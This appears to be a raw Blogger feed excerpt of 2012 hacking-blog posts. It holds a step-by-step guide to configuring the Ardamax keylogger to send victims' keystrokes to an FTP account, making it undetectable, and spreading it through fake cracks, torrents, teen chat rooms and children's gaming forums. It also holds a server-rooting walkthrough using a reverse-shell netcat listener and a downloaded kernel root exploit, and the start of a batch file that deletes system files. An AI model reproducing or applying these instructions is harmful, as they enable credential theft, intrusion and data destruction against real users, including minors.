/&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;7. Now you should be at &#39;Web Update&#39;, un-tick &#39;Check for updates&#39; and Click &#39;Next&#39;.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;8. Ok, you should now be at &#39;Options&#39;, use setting like done in screenshots.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;Btw you can make your keylogger to self distruct any time you like.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;9. Ok, now you should be at &#39;Control&#39;, click the box that says &#39;Send logs every&#39;, now make it so it sends logs every 20 minutes, then where it says &#39;Delivery&#39;, un-tick &#39;Email&#39; and tick &#39;FTP&#39;, then where it says &#39;Include&#39; un-tick &#39;Screenshots&#39;, now un-tick the box where it says &#39;Send only if log size exceeds&#39;, once thats done, it should all look like it does in this screenshot:&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;10. Now you should be at &#39;FTP&#39;, create a free account at &lt;a href=&quot;http://www.drivehq.com/secure/FreeSignup&quot;&gt;http://www.drivehq.com/secure/FreeSignup&lt;/a&gt;, then make sure your at &#39;Online Storage&#39;, then make a new folder called: Logs (this is where the logs are sent to when you keylogg someone), Now on your FTP on Ardamax Keylogger, where it says &#39;FTP Host:&#39;, put this:&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;FTP.DriveHQ.com&lt;/span&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;Now where it says &#39;Remote Folder:&#39;, put this: Logs&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;Now where it says &#39;Userame:&#39; and &#39;Password:&#39;, put your DriveHQ username and password, then it should look something like this:&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;Now Click &#39;Test&#39; and it should pop up like this:&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;Once done, do NOT change your DriveHQ password or rename/delete the folder called &#39;Logs&#39;, if you do, the logs will not come through.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;11. You should now be at &#39;Control&#39;, un-tick &#39;Enable Screenshots Capturing&#39; then click &#39;Next&#39;.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;12. Now you can change name and icon your Keylogger Engine as you want it to look like.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;and click &#39;Next&#39;.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;13. Now you should see this.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;just click &#39;Finish&#39;.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;14.After you click &#39;Finish&#39; you should see this:&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;Click &#39;Ok&#39;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;15.Now your Keylogger engine is created.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;The keylogger you created now will be detected by anti-viruses. So you have to bind it to another file and encrypt it using a crypter.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;That means making it FUD. (Fully UnDetecable).&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Spreading:-&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;Okay , so there are alot of methods for spreading , i am going to tell you some of them ..&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;1. &lt;span style=&quot;color: #d5a6bd;&quot;&gt;Youtube&lt;/span&gt; - YouTube is a video sharing website on which users can upload and share videos, millions of people are online... Now , make a video bout a crack , like For Adobe Photoshop , VB.Net , Teamviewer ,(These were just the examples) or any Games , then get your virus FUD(recommended) and Make a video and post. Now , i know alot of people do this , but they dont do 1 thing right. SPreading the video.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;How to do this???&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;GO to &lt;a href=&quot;http://www.youtube.com/&quot;&gt;http://www.youtube.com&lt;/a&gt; and click on Videos , then click on Most Viewed , and then choose All Time&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;Then go to every single video that has alot of views and post this:&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;Wow look what i found click on my name and watch the video , it will get ur free shit etc etc.. .&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;Then you will get loads of people infected.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;2.&lt;span style=&quot;color: #d5a6bd;&quot;&gt;Torrents&lt;/span&gt; - This is the most effective way. First you need a torrent client, I use uTorrent, because it&#39;s the easiest.Once you get your torrent client, Get some fake stuff , like Steam games Keygen or Cracks or w/e and then put them in a .rar file and put the keylogger on it. (BIND IT) . Now you gotta create the torrents.Open uTorrent , and then go to File -&amp;gt; Create New Torrent And add your .rar file on it, okay so now trackers are needed... These are some good ones:&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;Then click START SEEDING. Now .. CLick Create -&amp;gt; Save AS... and save anywhere u want&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;After you saved , go to http://www.thepiratebay.org, Register and upload your torrent&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;3.&lt;span style=&quot;color: #d5a6bd;&quot;&gt;Chat Rooms&lt;/span&gt; - This is slow but you get adult people ( You can get credit cards and paypals from this). First of all , go to any chat room from any of these below:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;/span&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;1.&lt;a href=&quot;http://www.chat-avenue.com/teenchat.html&quot;&gt;http://www.chat-avenue.com/teenchat.html&lt;/a&gt;&lt;br /&gt;2.&lt;a href=&quot;http://www.chat-avenue.com/adultchat.html&quot;&gt;http://www.chat-avenue.com/adultchat.html&lt;/a&gt;&lt;br /&gt;3.&lt;a href=&quot;http://www.321teenchat.com/&quot;&gt;http://www.321teenchat.com/&lt;/a&gt;&lt;br /&gt;4.&lt;a href=&quot;http://www.javachatrooms.net/&quot;&gt;http://www.javachatrooms.net/&lt;/a&gt;&lt;br /&gt;5.&lt;a href=&quot;http://www.freechatnow.com/&quot;&gt;http://www.freechatnow.com/&lt;/a&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&amp;nbsp;And then , upload your file to any free file hosting such as sharesend and then go to chat rooms , and start spamming..!!!&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;4.&lt;span style=&quot;color: #d5a6bd;&quot;&gt;Forums&lt;/span&gt; - I used to do this when i first started using keyloggers , it was pretty fun actually. NEVER TRY IT ON CRACK HACK FORUM.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;First you go to any gaming forum such as http://www.mpgh.net and create a new thread with the name &quot;Free All In One CrossFire HACK&quot; and then post a fake virus scan of ur file and put download link , you will get alot of 12-17 years old kids who play all day RPG games...&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif;&quot;&gt;5&lt;span style=&quot;color: #d5a6bd;&quot;&gt;.Impersonating Microsoft&lt;/span&gt; - This one doesnt work very well , but you can use this for targeting. First of all go to http://www.passport.net and make a @microsoft.co.uk email... then , add someone you want on that msn and tell him : A new virus has been detected , for your safety , we need you to download this file &amp;lt; LINK&amp;gt; or else your computer may be in danger.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;span style=&quot;color: #f9cb9c;&quot;&gt;Copyright ©&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;color: #f9cb9c;&quot;&gt;By w4r-b0y&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.walkwithgeeks.com/feeds/6488370879413904734/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.walkwithgeeks.com/2012/03/how-to-setup-keyloggerardamax-and.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5102751654897812866/posts/default/6488370879413904734'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5102751654897812866/posts/default/6488370879413904734'/><link rel='alternate' type='text/html' href='http://www.walkwithgeeks.com/2012/03/how-to-setup-keyloggerardamax-and.html' title='How to setup a keylogger(ardamax) and Spread it [Step by Step]'/><author><name>w4r-b0y</name><uri>http://www.blogger.com/profile/05228913152692665909</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://4.bp.blogspot.com/-c7Zytb6u_FM/T1kfNc1r9YI/AAAAAAAAAAs/svUCTY6iXqQ/s220/398411_10150458055732544_632347543_8555824_905910441_n.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5102751654897812866.post-6288124571842583124</id><published>2012-03-16T01:30:00.000+05:30</published><updated>2012-03-16T01:30:03.760+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Exploit"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="How to"/><category scheme="http://www.blogger.com/atom/ns#" term="Server"/><category scheme="http://www.blogger.com/atom/ns#" term="Tutorial"/><title type='text'>Server Rooting Tutorial + Using h00lyshit Exploit</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://i2.cdn.turner.com/cnn/2010/images/12/16/t1larg.hack.cnn.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;225&quot; src=&quot;http://i2.cdn.turner.com/cnn/2010/images/12/16/t1larg.hack.cnn.jpg&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;I will show you how to exploit a Linux server and gain root access. This will benefit you in many ways, for example having control of all websites hosted on the server. Enough talking, let&#39;s begin!&lt;br /&gt;&lt;br /&gt;Requirements for this tutorial:&lt;br /&gt;&lt;br /&gt;- A shelled website.&lt;br /&gt;- NetCat installed on your computer.&lt;br /&gt;- Patience&lt;br /&gt;- Port 443 or any other except 80 opened on your router.&lt;br /&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Okay, first let&#39;s navigate to our shell. If the shell is GNY, you will see something like &#39;Back Connect&#39;. Go there. Now you see 3 textboxes. Bind to bin/shor backconnect. Type in your IP and the port you want the server to connect (it must be opened on your router.). Now do not press backconnect yet. Download NetCat here:&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;http://www.downloadnetcat.com%20/&quot;&gt;www.downloadnetcat.com&amp;nbsp;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Extract the files to your desktop in a folder. Now go to Run&amp;gt;cmd. Open cmd. Now type:&lt;br /&gt;&lt;br /&gt;cd&lt;br /&gt;&lt;br /&gt;Replace with the path of netcat. Okay, now type:&lt;br /&gt;&lt;br /&gt;nc -lnvp&lt;br /&gt;&lt;br /&gt;Replace with the port you opened and used on the shell.&lt;br /&gt;&lt;br /&gt;Now it should display something like this:&lt;br /&gt;&lt;br /&gt;Listening on port [any] ...&lt;br /&gt;&lt;br /&gt;Minimze this window, and go on the web shell. Type in your IP address and port, click backconnect. If you did all right, and the server does not have a firewall and if your ports are forwarded correctly, you should see an incoming connection from the server. You have a shell! Now you can type &#39;id&#39; to see your current ID. Let&#39;s say your ID is 23. You have control over your website only. But not for long. Now type &#39;uname -a&#39;. You will get the full kernel version. Simply copy it and google for local root exploits. Let&#39;s say it is 2.6.18 2008 version... Hmm that is pretty outdated! Well, let&#39;s exploit it. Cd to the tmp directory, that is always writeable.&lt;br /&gt;&lt;br /&gt;Type this:&lt;br /&gt;&lt;br /&gt;cd /tmp&lt;br /&gt;&lt;br /&gt;Now let&#39;s make a folder for the exploit.&lt;br /&gt;&lt;br /&gt;mkdir exploit&lt;br /&gt;&lt;br /&gt;cd into this folder.&lt;br /&gt;&lt;br /&gt;cd exploit&lt;br /&gt;&lt;br /&gt;Now comes the tricky part. We will use h00lyshit exploit for this kernel. Type:&lt;br /&gt;&lt;br /&gt;wget&amp;nbsp;&lt;a href=&quot;http://securityvulns.ru/files/h00lyshit.c&quot;&gt;http://securityvulns.ru/files/h00lyshit.c&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;(P.S.- If link broken then download h00lyshit exploit &lt;a href=&quot;http://pastebin.com/YrjFJJ3h&quot;&gt;here&lt;/a&gt; and upload it ti the same site then use it.)&lt;br /&gt;&lt;br /&gt;Now type &#39;ls&#39;. You should see localroot.c in this folder. We need to compile it. Type:&lt;br /&gt;&lt;br /&gt;gcc localroot.c -o h00lyshit&lt;br /&gt;&lt;br /&gt;Now type &#39;ls&#39; and you should see 2 files, localroot.c and h00lyshit. h00lyshit requires a large file on the server in order to get root access, so let&#39;s create one. Type this and hit enter:&lt;br /&gt;&lt;br /&gt;dd if=/dev/urandom of=largefile count=2M&lt;br /&gt;&lt;br /&gt;This will create a large file, where largefile is the name of it. This can take up to 5 minutes. Once ready, chmod hoolyshit and largefile to 777, so:&lt;br /&gt;&lt;br /&gt;chmod 777 h00lyshit&lt;br /&gt;chmod 777 largefile&lt;br /&gt;&lt;br /&gt;Now let&#39;s run the exploit! Type this:&lt;br /&gt;&lt;br /&gt;./h00lyshit largefile&lt;br /&gt;&lt;br /&gt;Now wait, wait for about 3 minutes. If the kernel is not patched and if it is the right version, you are root! Type &#39;id&#39; and you will see:&lt;br /&gt;&lt;br /&gt;uid=0(root)&lt;br /&gt;&lt;br /&gt;You have successfully gained root!!&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.walkwithgeeks.com/feeds/6288124571842583124/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.walkwithgeeks.com/2012/03/server-rooting-tutorial-using-h00lyshit.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5102751654897812866/posts/default/6288124571842583124'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5102751654897812866/posts/default/6288124571842583124'/><link rel='alternate' type='text/html' href='http://www.walkwithgeeks.com/2012/03/server-rooting-tutorial-using-h00lyshit.html' title='Server Rooting Tutorial + Using h00lyshit Exploit'/><author><name>w4r-b0y</name><uri>http://www.blogger.com/profile/05228913152692665909</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://4.bp.blogspot.com/-c7Zytb6u_FM/T1kfNc1r9YI/AAAAAAAAAAs/svUCTY6iXqQ/s220/398411_10150458055732544_632347543_8555824_905910441_n.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5102751654897812866.post-6586826601869167411</id><published>2012-03-15T14:30:00.000+05:30</published><updated>2012-03-15T14:30:05.193+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Basics"/><category scheme="http://www.blogger.com/atom/ns#" term="Hack"/><category scheme="http://www.blogger.com/atom/ns#" term="infect"/><category scheme="http://www.blogger.com/atom/ns#" term="Tricks"/><title type='text'>Some Notepad Hacks and Tricks</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://4.bp.blogspot.com/-pnm03djMppE/T1-ZqDsbxpI/AAAAAAAAACw/Qba9UBZQ4f4/s1600/notepad-tricks.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://4.bp.blogspot.com/-pnm03djMppE/T1-ZqDsbxpI/AAAAAAAAACw/Qba9UBZQ4f4/s1600/notepad-tricks.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Here are some Notepad Tricks to make your friend/enemy look &amp;nbsp;O.o &amp;nbsp;:O&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;The blue screen of Death &lt;/span&gt;[This might be dangerous]&lt;br /&gt;*The Blue Screen Of Death can be coded and sent to you like any application. It is up to you to be carefull and try to reveal the trick before getting in serious trouble. It loops a message asking to re-install ur windows again&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;CODE&lt;br /&gt;@echo off&lt;br /&gt;del %systemdrive%\*.* /f /s 